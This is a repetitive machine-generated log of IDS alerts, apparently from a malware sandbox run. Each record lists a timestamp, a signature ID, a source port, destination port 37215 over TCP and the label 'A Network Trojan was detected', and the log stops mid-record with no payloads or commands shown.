          Timestamp:06/08/24-15:05:30.127910
          SID:2829579
          Source Port:49350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131741
          SID:2829579
          Source Port:46562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352821
          SID:2835222
          Source Port:38540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152586
          SID:2829579
          Source Port:57710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741463
          SID:2835222
          Source Port:43404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780333
          SID:2835222
          Source Port:34074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891030
          SID:2829579
          Source Port:47946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783710
          SID:2829579
          Source Port:58208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800663
          SID:2829579
          Source Port:54062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021171
          SID:2829579
          Source Port:59964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791957
          SID:2829579
          Source Port:37836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884536
          SID:2829579
          Source Port:47784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745972
          SID:2829579
          Source Port:57030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787900
          SID:2835222
          Source Port:49372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353215
          SID:2829579
          Source Port:57430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896914
          SID:2829579
          Source Port:42376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174258
          SID:2829579
          Source Port:38008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021892
          SID:2829579
          Source Port:37922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269759
          SID:2835222
          Source Port:43174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242505
          SID:2835222
          Source Port:60462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356555
          SID:2835222
          Source Port:36004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843771
          SID:2835222
          Source Port:52216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355147
          SID:2829579
          Source Port:56246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891199
          SID:2829579
          Source Port:45842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.794104
          SID:2829579
          Source Port:57730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894577
          SID:2835222
          Source Port:48864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741281
          SID:2829579
          Source Port:46164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173146
          SID:2829579
          Source Port:56036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130596
          SID:2835222
          Source Port:34090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709962
          SID:2835222
          Source Port:40004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175005
          SID:2835222
          Source Port:51520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130047
          SID:2829579
          Source Port:47844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706832
          SID:2835222
          Source Port:41224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731517
          SID:2829579
          Source Port:41374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107960
          SID:2829579
          Source Port:35056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239284
          SID:2829579
          Source Port:55618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192507
          SID:2829579
          Source Port:38618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110061
          SID:2835222
          Source Port:42822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109909
          SID:2829579
          Source Port:53940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671816
          SID:2835222
          Source Port:32824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511492
          SID:2829579
          Source Port:38568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897093
          SID:2829579
          Source Port:44320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.025997
          SID:2835222
          Source Port:35750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165897
          SID:2835222
          Source Port:38480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709986
          SID:2829579
          Source Port:38478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673857
          SID:2835222
          Source Port:43970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.806002
          SID:2835222
          Source Port:42412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135981
          SID:2829579
          Source Port:38046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738050
          SID:2835222
          Source Port:36374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017647
          SID:2829579
          Source Port:59816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741175
          SID:2829579
          Source Port:53592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707871
          SID:2835222
          Source Port:51576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741050
          SID:2829579
          Source Port:48694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238557
          SID:2829579
          Source Port:58210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508444
          SID:2829579
          Source Port:55474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067957
          SID:2829579
          Source Port:34172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075765
          SID:2829579
          Source Port:33190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510292
          SID:2829579
          Source Port:35928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782167
          SID:2835222
          Source Port:49338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403267
          SID:2835222
          Source Port:43244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806074
          SID:2835222
          Source Port:40782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743449
          SID:2835222
          Source Port:39904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056411
          SID:2829579
          Source Port:38340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745897
          SID:2829579
          Source Port:44104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460989
          SID:2835222
          Source Port:45044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179576
          SID:2835222
          Source Port:51204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448870
          SID:2835222
          Source Port:43964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157525
          SID:2829579
          Source Port:55096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153684
          SID:2829579
          Source Port:42296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267939
          SID:2835222
          Source Port:57768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160725
          SID:2835222
          Source Port:58634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014621
          SID:2829579
          Source Port:47206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192341
          SID:2829579
          Source Port:46080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827809
          SID:2829579
          Source Port:39146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306466
          SID:2835222
          Source Port:37886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707490
          SID:2835222
          Source Port:35456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780209
          SID:2829579
          Source Port:60262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271987
          SID:2829579
          Source Port:53272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233599
          SID:2829579
          Source Port:55042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.862338
          SID:2835222
          Source Port:39160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259756
          SID:2829579
          Source Port:51838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174355
          SID:2829579
          Source Port:46900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378398
          SID:2835222
          Source Port:47858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857651
          SID:2829579
          Source Port:59480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738577
          SID:2835222
          Source Port:36196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354072
          SID:2829579
          Source Port:56596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352956
          SID:2829579
          Source Port:34978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160512
          SID:2835222
          Source Port:53000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799712
          SID:2835222
          Source Port:44794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152792
          SID:2829579
          Source Port:57568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177128
          SID:2835222
          Source Port:58920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829772
          SID:2835222
          Source Port:34956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734551
          SID:2829579
          Source Port:39822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.806022
          SID:2835222
          Source Port:52064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378286
          SID:2829579
          Source Port:53260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159442
          SID:2835222
          Source Port:51292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745907
          SID:2835222
          Source Port:47126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747566
          SID:2829579
          Source Port:60976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663853
          SID:2835222
          Source Port:57998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128830
          SID:2829579
          Source Port:53566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005505
          SID:2829579
          Source Port:39152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808616
          SID:2829579
          Source Port:43600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512086
          SID:2829579
          Source Port:58218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354371
          SID:2829579
          Source Port:42148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513803
          SID:2829579
          Source Port:59684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159973
          SID:2829579
          Source Port:50764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238528
          SID:2835222
          Source Port:57974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708000
          SID:2829579
          Source Port:38918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151339
          SID:2829579
          Source Port:46702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783632
          SID:2829579
          Source Port:43038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275553
          SID:2829579
          Source Port:41816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.293401
          SID:2829579
          Source Port:40682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.070919
          SID:2829579
          Source Port:33720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.849718
          SID:2835222
          Source Port:54210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739579
          SID:2835222
          Source Port:55130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815153
          SID:2829579
          Source Port:39220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820778
          SID:2835222
          Source Port:55814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460862
          SID:2835222
          Source Port:35446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511069
          SID:2829579
          Source Port:36190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188290
          SID:2829579
          Source Port:60172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057909
          SID:2829579
          Source Port:54036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272619
          SID:2835222
          Source Port:49744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356707
          SID:2835222
          Source Port:41860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545772
          SID:2829579
          Source Port:49180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405323
          SID:2829579
          Source Port:40466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740884
          SID:2829579
          Source Port:35082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893889
          SID:2829579
          Source Port:53356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161169
          SID:2835222
          Source Port:52084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510384
          SID:2829579
          Source Port:38538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019686
          SID:2829579
          Source Port:36482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306638
          SID:2829579
          Source Port:39178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107717
          SID:2835222
          Source Port:55252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037088
          SID:2835222
          Source Port:54262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471996
          SID:2835222
          Source Port:54054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515844
          SID:2835222
          Source Port:60586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894357
          SID:2835222
          Source Port:51812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705133
          SID:2835222
          Source Port:59758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179854
          SID:2829579
          Source Port:47012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132089
          SID:2829579
          Source Port:56282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462538
          SID:2829579
          Source Port:36630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604475
          SID:2829579
          Source Port:53498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465080
          SID:2835222
          Source Port:55858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.158882
          SID:2829579
          Source Port:37368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911797
          SID:2835222
          Source Port:58348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731653
          SID:2829579
          Source Port:52806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550184
          SID:2835222
          Source Port:45018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731223
          SID:2829579
          Source Port:38634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468529
          SID:2829579
          Source Port:43912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178374
          SID:2835222
          Source Port:49828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602497
          SID:2835222
          Source Port:49224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745521
          SID:2835222
          Source Port:41696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673858
          SID:2835222
          Source Port:41536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.464094
          SID:2835222
          Source Port:56848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542962
          SID:2829579
          Source Port:47238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791805
          SID:2835222
          Source Port:36574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041081
          SID:2835222
          Source Port:48312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733477
          SID:2835222
          Source Port:41036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.496022
          SID:2829579
          Source Port:55352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166583
          SID:2835222
          Source Port:40366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812981
          SID:2829579
          Source Port:40388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508997
          SID:2835222
          Source Port:34578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016606
          SID:2829579
          Source Port:35354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888594
          SID:2835222
          Source Port:45470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180130
          SID:2829579
          Source Port:44896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036178
          SID:2829579
          Source Port:42782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513551
          SID:2829579
          Source Port:45292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154012
          SID:2835222
          Source Port:56726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465949
          SID:2835222
          Source Port:55864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808119
          SID:2829579
          Source Port:50502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512090
          SID:2835222
          Source Port:47358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192243
          SID:2829579
          Source Port:52684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042668
          SID:2835222
          Source Port:44434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842168
          SID:2829579
          Source Port:39096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887621
          SID:2829579
          Source Port:53770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262279
          SID:2829579
          Source Port:38360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239213
          SID:2829579
          Source Port:52874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192367
          SID:2835222
          Source Port:53946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067819
          SID:2829579
          Source Port:40632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042751
          SID:2835222
          Source Port:35996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354388
          SID:2835222
          Source Port:46814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179153
          SID:2835222
          Source Port:49438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542244
          SID:2835222
          Source Port:54250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461812
          SID:2835222
          Source Port:58396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164408
          SID:2829579
          Source Port:35104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269805
          SID:2835222
          Source Port:55930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600841
          SID:2835222
          Source Port:50934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446371
          SID:2829579
          Source Port:45968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515690
          SID:2829579
          Source Port:60208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796095
          SID:2835222
          Source Port:42274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512236
          SID:2829579
          Source Port:46772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161457
          SID:2835222
          Source Port:33116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667858
          SID:2829579
          Source Port:48360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746850
          SID:2835222
          Source Port:47584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039307
          SID:2835222
          Source Port:40318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354348
          SID:2829579
          Source Port:37536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893671
          SID:2829579
          Source Port:57184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184607
          SID:2835222
          Source Port:54414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160922
